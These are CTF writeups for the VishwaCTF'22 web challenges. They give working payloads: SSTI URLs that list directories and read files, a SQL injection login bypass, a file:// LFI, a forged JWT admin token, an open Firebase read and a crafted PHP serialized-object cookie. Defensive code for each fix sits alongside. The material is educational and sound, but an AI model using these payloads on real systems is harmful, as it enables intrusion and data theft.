VishwaCTF’22 writeups: Web

Below are writeups for all the Web challenges from VishwaCTF'22, organised by Cyber Cell VIIT, Pune.

Flag.Collection


Solution:

The challenge was about a common Firebase vulnerability: people forget to set up proper Firebase security rules and end up giving anyone access to their database.

Step 1:

If you inspect the web page you will find a lot of obfuscated JS. Looking closely at the end, you will find a Firebase config. Using it we can build our own frontend/CLI app to access the database and list all its entries, in the hope of finding the real flag.


Step 2:

I made a simple JS script to query everything that was present in the database.

// Assumes the Firebase compat SDK (firebase-app-compat.js and
// firebase-firestore-compat.js) is loaded on the page before this script.
// The config below is the one found at the end of the obfuscated JS.
firebase.initializeApp({
  apiKey: "AIzaSyCOrohCmYL_hq5DaqFbQM3rxHXT0pNE6SA",
  authDomain: "vishwa-ctf-challenge-12.firebaseapp.com",
  projectId: "vishwa-ctf-challenge-12",
  storageBucket: "vishwa-ctf-challenge-12.appspot.com",
  messagingSenderId: "125452069157",
  appId: "1:125452069157:web:2d20b318f3e448ebfa52cc",
});

var db = firebase.firestore();
const getd = async function () {
  // With no security rules in place, an unauthenticated client can read the whole collection.
  const res = await db.collection("flag").get();
  res.forEach((doc) => {
    // doc.data() returns the document's fields as a plain object.
    console.log(doc.id, doc.data());
  });
};

getd();

After running this lil' script, I got a bunch of entries and the topmost one contained the main flag.


vishwaCTF{c0nfigur3_y0ur_fir3b@s3_rule$}
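The fix for this class of bug lives in the Firestore security rules, so here is an added example (not the challenge's own rules) showing the weak setting beside the corrected one. The first ruleset is the wide-open pattern that lets anyone holding the public web config read and write everything; the second denies by default, allows reads of the flag collection only to signed-in users, and blocks client-side writes. The collection name flag comes from the script above; the rest is illustrative.

```text
// WEAK: every collection readable and writable by anyone who has the
// apiKey/projectId from the page source (the apiKey is an identifier, not a secret).
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /{document=**} {
      allow read, write: if true;
    }
  }
}

// CORRECTED: nothing is allowed unless a rule says so; the flag collection
// is readable only by authenticated users and never writable from the client.
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /flag/{docId} {
      allow read: if request.auth != null;
      allow write: if false;
    }
  }
}
```

The two rulesets are shown side by side for comparison; a deployed firestore.rules file contains one of them. Since the web config is always visible to clients, the rules are the only access control between an anonymous browser and the data.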

Hey Buddy


Solution:

This challenge is built with Flask and contains a Server Side Template Injection (SSTI) vulnerability. Exploiting it takes two steps.

Step 1: Finding the location of the flag file

https://h3y-buddy.vishwactf.com/submit?name={{request.application.__globals__.__builtins__.__import__(%27os%27).listdir()}}

Step 2: Reading the flag file through the vulnerability

https://h3y-buddy.vishwactf.com/submit?name={{%27abc%27.__class__.__base__.__subclasses__()[92].__subclasses__()[0].__subclasses__()[0](%27flag.txt%27).read()}}

Keep Your Secrets


Solution:

This is a simple JWT hacking challenge. We need to forge a JWT whose role claim is admin instead of user.

Step 1:

Get the JWT token by making a GET request.


Step 2:

Using a tool like jwt-cracker, you can brute-force the signing secret. After brute-forcing it you get the secret: owasp.

Step 3:

Go to jwt.io, change the role from 'user' to 'admin' and enter the secret. Then copy the newly forged token.

Step 4:

Using Postman (or any other tool), make a POST request to /api/login/user and send the forged token in a header named 'token'.


The response contains the flag.

vishwactf{w3@k_$ecr3t$}
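To show what the server side of this challenge should have looked like, here is an added Python example (not the challenge's code) of HS256 verification done properly: the algorithm is pinned server-side, the signature is checked with a constant-time compare before the role claim is trusted, and a strength check rejects secrets shorter than the 256 bits that RFC 7518 requires for HS256. The secret owasp is the one recovered in the writeup; the claim names and the random strong secret are constructed here.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

WEAK_SECRET = "owasp"                       # recovered in the writeup
STRONG_SECRET = secrets.token_urlsafe(32)   # 256 bits of randomness, generated here


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Build a compact HS256 JWT: header.payload.signature."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    signature = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(signature)}"


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the payload only if the token is validly signed with `secret`, else None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    # The server decides the algorithm; the token's alg field is never trusted (no "none").
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(_b64url_decode(body_b64))


def tamper_role(token: str, new_role: str) -> str:
    """Edit the role claim without re-signing: all an attacker can do without the secret."""
    header_b64, body_b64, sig_b64 = token.split(".")
    payload = json.loads(_b64url_decode(body_b64))
    payload["role"] = new_role
    new_body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header_b64}.{new_body}.{sig_b64}"


def secret_is_strong(secret: str) -> bool:
    """RFC 7518 section 3.2: an HS256 key must be at least as long as the hash output (32 bytes)."""
    return len(secret.encode()) >= 32


def is_admin(token: str, secret: str) -> bool:
    """What /api/login/user should do: verify first, then read the role claim."""
    payload = verify_hs256(token, secret)
    return payload is not None and payload.get("role") == "admin"
```

The writeup's attack works only because the signing key is a dictionary word: editing the claim alone breaks the signature, but re-signing with a recovered secret produces a token the server accepts. With a key that passes secret_is_strong, brute-forcing is not practical and the same verification code holds.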

My useless website


Solution:

This is a simple SQL injection example which you probably know already. Entering 'OR'1'='1 in both inputs (username and password) returns the flag in a SweetAlert popup.

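To make the mechanism concrete, here is an added Python example (not the challenge's code) that runs the writeup's payload against a string-built query and against a parameterised one, using an in-memory SQLite table with one constructed account. The built_query helper shows the exact SQL the vulnerable version sends, which is where the AND/OR precedence makes the WHERE clause always true.

```python
import sqlite3

# The payload used in the writeup, entered as both username and password.
PAYLOAD = "'OR'1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account.

    Passwords are stored in clear here only to keep the example short;
    a real application stores a salted password hash.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", "correct horse battery staple"))
    return conn


def built_query(username: str, password: str) -> str:
    """The SQL text the vulnerable login actually sends to the database."""
    return f"SELECT 1 FROM users WHERE username='{username}' AND password='{password}'"


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: the quotes in the payload close the literal, and the
    trailing OR '1'='1' makes the whole WHERE clause true for every row."""
    return conn.execute(built_query(username, password)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL text, so the
    payload is compared as a literal username and never parsed as SQL."""
    query = "SELECT 1 FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None
```

With the payload, built_query produces WHERE username=''OR'1'='1' AND password=''OR'1'='1'; since AND binds tighter than OR, the final OR '1'='1' is enough on its own. The parameterised version looks for a user literally named 'OR'1'='1 and finds none.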

Request me FLAG


Solution:

The challenge name itself contains the hint. Request Me FLAG means changing the HTTP request method from GET to FLAG using Burp Suite or curl.

$ curl -I https://r3qu35t-m3-fl4g.vishwactf.com -X FLAG
HTTP/1.1 200 OK
date: Mon, 21 Mar 2022 09:55:32 GMT
server: Apache/2.4.37 (Red Hat Enterprise Linux) OpenSSL/1.1.1k
flag: VishwaCTF{404_1s_ju57_4n_i11u5ion}
content-length: 0
content-type: text/html; charset=UTF-8

Stock bot


Solution:

This challenge includes a Local File Inclusion (LFI) vulnerability. The page fetches stock data for a particular product, and the location of the flag is given as a comment in the script. There might be other ways to get the flag, but I injected the payload into the URL, which looks like the one below.

https://st0ck-b0t.vishwactf.com/Products/check.php?product=file:///opt/app-root/src/Products/Flag
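The defensive counterpart to this payload is to never let the product parameter name a file. The following is an added Python example (not the challenge's PHP): read_stock_vulnerable opens whatever the parameter says, including a file:// URL, while read_stock_safe maps the parameter through an allowlist and then checks that the resolved path still lies inside the products directory. The directory layout, product names and the demo function that builds a throwaway tree are all constructed here; only the Products directory name mirrors the challenge URL.

```python
import tempfile
from pathlib import Path
from typing import Optional

# Constructed allowlist: the user-facing product name maps to a fixed file name.
PRODUCTS = {"widget": "widget.txt", "gadget": "gadget.txt"}


def read_stock_vulnerable(base_dir: Path, product: str) -> str:
    """Mimics the vulnerable behaviour: a file:// URL, an absolute path or ../ all work."""
    target = product[len("file://"):] if product.startswith("file://") else product
    path = Path(target)
    if not path.is_absolute():
        path = base_dir / path
    return path.read_text()


def read_stock_safe(base_dir: Path, product: str) -> Optional[str]:
    """Allowlist first, then confirm the resolved file sits directly under base_dir."""
    filename = PRODUCTS.get(product)
    if filename is None:
        return None
    base = base_dir.resolve()
    candidate = (base / filename).resolve()
    if candidate.parent != base:   # defence in depth against symlinks or traversal
        return None
    if not candidate.is_file():
        return None
    return candidate.read_text()


def demo() -> dict:
    """Build <root>/Products/widget.txt plus <root>/Flag outside the products directory."""
    root = Path(tempfile.mkdtemp())
    products = root / "Products"
    products.mkdir()
    (products / "widget.txt").write_text("widget: 12 in stock")
    (root / "Flag").write_text("constructed{not_the_real_flag}")
    flag_url = f"file://{root / 'Flag'}"   # same shape as the writeup's payload
    return {
        "vuln_normal": read_stock_vulnerable(products, "widget.txt"),
        "vuln_lfi": read_stock_vulnerable(products, flag_url),
        "safe_normal": read_stock_safe(products, "widget"),
        "safe_lfi": read_stock_safe(products, flag_url),
        "safe_traversal": read_stock_safe(products, "../Flag"),
    }
```

The allowlist is the real control: once the parameter can only select a key, there is no path for the user to shape. The resolve-and-compare check is a second layer in case the file names are ever taken from somewhere less controlled.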

Strong Encryption


Solution:

In this challenge you are given a flag encrypted by the encrypt function in the provided PHP code. There are two ways to solve it: either manually reverse the encryption logic, or write code to do it.

Decrypt.php

<?php
// Layout of $str: [hex body][2 hex chars: rKey][64 hex chars: key hash].
// Negative string offsets such as $str[-66] need PHP 7.1 or later.
function decrypt($str, $uenKey){

    $enKeyHash = '';
    $strHex    = '';
    $Key       = '';
    $tmpKey    = '';
    $decTxt    = '';

    // Last 64 chars: the key hash. Collected here but never checked below.
    for($i = strlen($str) - 64; $i < strlen($str); $i++){
        $enKeyHash .= $str[$i];
    }

    // The two chars before the hash: a one-byte round key in hex.
    $rKeyHex = $str[-66] . $str[-65];
    $rKey    = hexdec($rKeyHex);

    // Everything before that: the encrypted body, two hex chars per plaintext char.
    for($i = 0; $i < strlen($str) - 66; $i++){
        $strHex .= $str[$i];
    }

    // $Key is the decimal value of ord(char)+rKey for every passphrase char,
    // concatenated into one digit string and consumed one digit at a time.
    for($i = 0; $i < strlen($uenKey); $i++){
        $Key    .= ord($uenKey[$i]) + $rKey;
        $tmpKey .= chr(ord($uenKey[$i]) + $rKey);
    }

    // Each body byte has one digit of $Key subtracted, cycling through $Key.
    for($i = 0, $j = 0; $i < strlen($str) - 66; $i += 2, $j++){
        if($j == strlen($Key)){
            $j = 0;
        }
        $decTxt .= chr(hexdec($str[$i] . $str[$i+1]) - $Key[$j]);
    }
    return $decTxt;
}

$encTxt = "576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982452f12f4712f4c769a75b33cb995fa169056168939a8b0b28eafe0d724f18dc4a7";
$decTxt = decrypt($encTxt, "VishwaCTF");
echo $decTxt;

Output:

VishwaCTF{y0u_h4v3_4n_0p_m1nd}
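To make the key derivation easy to follow, here is an added Python port (not the challenge's own code) of the decrypt function above, split into the three steps the PHP performs: slicing the blob, building the digit key from the passphrase and round key, and subtracting one key digit per byte. It also includes encrypt_body, an inferred inverse of the body transformation only; the challenge's real encrypt function is not on this page, and since decrypt never compares the trailing 64-character hash, nothing about how that hash is produced is assumed. The ciphertext and the passphrase VishwaCTF are the values from the challenge.

```python
# Ciphertext and passphrase from the challenge; the expected output is the flag.
ENC_TXT = ("576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982"
           "452f12f4712f4c769a75b33cb995fa169056168939a8b0b28eafe0d724f18dc4a7")
PASSPHRASE = "VishwaCTF"


def split_blob(enc: str):
    """Layout used by decrypt(): [hex body][2 hex chars rKey][64 hex chars hash]."""
    return enc[:-66], int(enc[-66:-64], 16), enc[-64:]


def derive_key_digits(passphrase: str, r_key: int) -> str:
    """PHP's $Key: decimal ord()+rKey of each passphrase char, concatenated into one digit string."""
    return "".join(str(ord(c) + r_key) for c in passphrase)


def decrypt(enc: str, passphrase: str) -> str:
    body, r_key, key_hash = split_blob(enc)
    # key_hash is collected by the PHP code but never compared with anything,
    # so the trailing 64 characters add no integrity protection.
    key = derive_key_digits(passphrase, r_key)
    out = []
    for j, i in enumerate(range(0, len(body), 2)):
        digit = int(key[j % len(key)])          # PHP coerces the '0'-'9' char to an int
        out.append(chr(int(body[i:i + 2], 16) - digit))
    return "".join(out)


def encrypt_body(plaintext: str, passphrase: str, r_key: int) -> str:
    """Inferred inverse of the body step: add one key digit per char, emit two lowercase hex chars."""
    key = derive_key_digits(passphrase, r_key)
    return "".join(format(ord(c) + int(key[j % len(key)]), "02x") for j, c in enumerate(plaintext))
```

Because the only secret material is the fixed passphrase and a single byte of round key, and each plaintext byte is shifted by at most 9, the scheme leaks almost all of the plaintext structure; that is why reversing it by hand is feasible at all.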

Todo List


Solution:

This challenge contains a PHP Object Injection vulnerability that lets an attacker modify a serialized object. When you add a task to the list, the list is stored in a cookie as a serialized object, and your task is to modify that object. Reading the provided PHP code carefully gives you the basic idea for building the payload.

Payload Creation

Step 1 - Basic payload to read flag.php

a:1:{i:1;O:10:"ShowSource":1:{s:6:"source";s:8:"flag.php";}}

Step 2 - Getting SHA1 hash of above payload


Step 3 - Encoding the basic payload


Step 4 - Concatenate the generated hash and the encoded basic payload.

168ebef72875ddf6d6e4ac71f87a4bb2be6b5373a%3A1%3A%7Bi%3A1%3BO%3A10%3A%22ShowSource%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D

Payload Injection

Step 1 - Just add any random task in todo list

Step 2 - Go to cookies section by inspecting the page


Step 3 - Edit the todos cookie value, paste the payload and refresh the page.

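Steps 2 to 4 of the payload creation show why the cookie's SHA1 prefix offers no protection: an unkeyed digest can be recomputed by whoever controls the data. The following added Python example (not the challenge's PHP) rebuilds that cookie format, a 40-character SHA1 followed by the URL-encoded serialized value, and sets it beside a keyed HMAC variant that an attacker cannot forge without the server key. The honest todo list and the server key are constructed; the ShowSource payload is the one from step 1. The real fix for this bug class is to stop calling unserialize() on user-controlled data at all (a JSON list of strings would do here); the MAC is what to do while that is not yet possible.

```python
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import quote, unquote

SERVER_KEY = secrets.token_bytes(32)   # constructed; known only to the server

HONEST_TODOS = 'a:1:{i:0;s:9:"buy bread";}'   # constructed PHP-serialized array
ATTACKER_TODOS = 'a:1:{i:1;O:10:"ShowSource":1:{s:6:"source";s:8:"flag.php";}}'  # from the writeup


def make_cookie_weak(serialized: str) -> str:
    """Writeup steps 2-4: sha1(value) + urlencode(value). Anyone can compute both halves."""
    return hashlib.sha1(serialized.encode()).hexdigest() + quote(serialized, safe="")


def verify_cookie_weak(cookie: str) -> Optional[str]:
    digest, encoded = cookie[:40], cookie[40:]
    serialized = unquote(encoded)
    if hmac.compare_digest(digest, hashlib.sha1(serialized.encode()).hexdigest()):
        return serialized
    return None


def make_cookie_keyed(serialized: str, key: bytes = SERVER_KEY) -> str:
    """Same layout, but the tag is HMAC-SHA256 under a key the client never sees."""
    tag = hmac.new(key, serialized.encode(), hashlib.sha256).hexdigest()
    return tag + quote(serialized, safe="")


def verify_cookie_keyed(cookie: str, key: bytes = SERVER_KEY) -> Optional[str]:
    tag, encoded = cookie[:64], cookie[64:]
    serialized = unquote(encoded)
    expected = hmac.new(key, serialized.encode(), hashlib.sha256).hexdigest()
    if hmac.compare_digest(tag, expected):
        return serialized
    return None


def contains_object(serialized: str) -> bool:
    """Cheap sanity check: a todo list of strings should never carry a serialized object (O:...)."""
    return "O:" in serialized
```

The weak verifier accepts the attacker's payload because the attacker computed its SHA1 just as the writeup did; the keyed verifier rejects the same payload, whether it was tagged under a guessed key or spliced onto an honest tag. contains_object is only a tripwire for logging; it is not a substitute for removing unserialize() from the request path.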
